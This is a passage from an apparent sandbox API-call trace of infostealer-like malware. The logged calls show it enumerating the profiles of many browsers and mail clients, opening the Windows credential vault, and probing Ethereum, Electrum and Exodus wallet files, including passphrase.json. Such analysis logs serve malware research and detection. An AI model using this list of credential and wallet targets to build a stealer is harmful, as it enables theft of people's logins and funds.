"c:\\users\\rdhj0cnfevzx\\appdata\\local\\opera software\\opera neon\\user data\\local state")) returned 0xffffffff [0174.817] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\*") returned 73 [0174.817] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\opera software\\opera neon\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x4e0020, ftCreationTime.dwLowDateTime=0x6f0065, ftCreationTime.dwHighDateTime=0x5c006e, ftLastAccessTime.dwLowDateTime=0x730055, ftLastAccessTime.dwHighDateTime=0x720065, ftLastWriteTime.dwLowDateTime=0x440020, ftLastWriteTime.dwHighDateTime=0x740061, nFileSizeHigh=0x5c0061, nFileSizeLow=0x6f004c, dwReserved0=0x610063, dwReserved1=0x20006c, cFileName="S", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.818] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.819] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0174.819] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0174.819] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini" [0174.819] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 0xffffffff [0174.819] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.819] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\FlashPeak\\SlimBrowser\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\" [0174.819] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\" [0174.819] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\..\\profiles.ini" [0174.819] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashPeak\\SlimBrowser\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\flashpeak\\slimbrowser\\profiles.ini")) returned 0xffffffff [0174.819] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.820] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Moonchild Productions\\Pale Moon\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" [0174.820] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\" [0174.820] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini" [0174.820] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\moonchild productions\\pale moon\\profiles.ini")) returned 0xffffffff [0174.820] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.820] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Waterfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" [0174.820] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\" [0174.820] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini" [0174.820] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\waterfox\\profiles.ini")) returned 0xffffffff [0174.820] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.821] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\8pecxstudios\\Cyberfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" [0174.821] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\" [0174.821] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini" [0174.821] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pecxstudios\\cyberfox\\profiles.ini")) returned 0xffffffff [0174.821] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.821] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\NETGATE Technologies\\BlackHawk\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" [0174.821] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\" [0174.821] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini" [0174.821] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\netgate technologies\\blackhawk\\profiles.ini")) returned 0xffffffff [0174.821] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.821] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Mozilla\\icecat\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" [0174.821] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\" [0174.821] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini" [0174.821] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\icecat\\profiles.ini")) returned 0xffffffff [0174.822] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.822] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\K-Meleon\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" [0174.822] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" [0174.822] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini" [0174.822] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\profiles.ini")) returned 0xffffffff [0174.822] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.822] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Thunderbird\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" [0174.822] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" [0174.822] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini" [0174.822] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\thunderbird\\profiles.ini")) returned 0xffffffff [0174.822] GetVersionExA (in: lpVersionInformation=0x198424*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x198424*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0174.823] LoadLibraryA (lpLibFileName="vaultcli.dll") returned 0x6fed0000 [0174.823] VaultOpenVault () returned 0x0 [0174.828] VaultEnumerateItems () returned 0x0 [0174.829] VaultFree () returned 0x0 [0174.829] VaultCloseVault () returned 0x0 [0174.829] FreeLibrary (hLibModule=0x6fed0000) returned 1 [0174.829] lstrlenA (lpString="") returned 0 [0174.830] lstrlenA (lpString="5qDlPuVKoR.txt") returned 14 [0174.830] StrCmpCA (pszStr1=".txt", pszStr2=".Z") returned 26 [0174.830] StrCmpCA (pszStr1=".txt", pszStr2=".zip") returned -6 [0174.831] StrCmpCA (pszStr1=".txt", pszStr2=".zoo") returned -6 [0174.831] StrCmpCA (pszStr1=".txt", pszStr2=".arc") returned 19 [0174.831] StrCmpCA (pszStr1=".txt", pszStr2=".lzh") returned 8 [0174.831] StrCmpCA (pszStr1=".txt", pszStr2=".arj") returned 19 [0174.831] StrCmpCA (pszStr1=".txt", pszStr2=".gz") returned 13 [0174.831] StrCmpCA (pszStr1=".txt", pszStr2=".tgz") returned 17 [0174.831] FreeLibrary (hLibModule=0x0) returned 0 [0174.831] FreeLibrary (hLibModule=0x0) returned 0 [0174.835] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.835] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Ethereum\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\" [0174.835] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ethereum")) returned 0 [0174.835] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\\\keystore") returned 56 [0174.835] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ethereum\\\\keystore" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ethereum\\keystore"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.836] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.836] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Electrum\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\" [0174.836] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electrum\\wallets")) returned 0 [0174.836] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\\\*.*") returned 59 [0174.836] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum\\wallets\\\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electrum\\wallets\\*.*"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.836] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.836] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Electrum-LTC\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\" [0174.836] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electrum-ltc\\wallets")) returned 0 [0174.836] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\\\*.*") returned 63 [0174.836] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Electrum-LTC\\wallets\\\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electrum-ltc\\wallets\\*.*"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.837] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.837] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" [0174.837] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus")) returned 0 [0174.837] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\exodus.conf.json") returned 62 [0174.837] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\exodus.conf.json" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.conf.json"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.837] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.837] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" [0174.837] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus")) returned 0 [0174.837] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\window-state.json") returned 63 [0174.837] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\\\window-state.json" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\window-state.json"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.837] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.838] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0174.838] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0174.838] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\passphrase.json") returned 75 [0174.838] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\passphrase.json" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet\\passphrase.json"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.838] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.838] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0174.838] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: 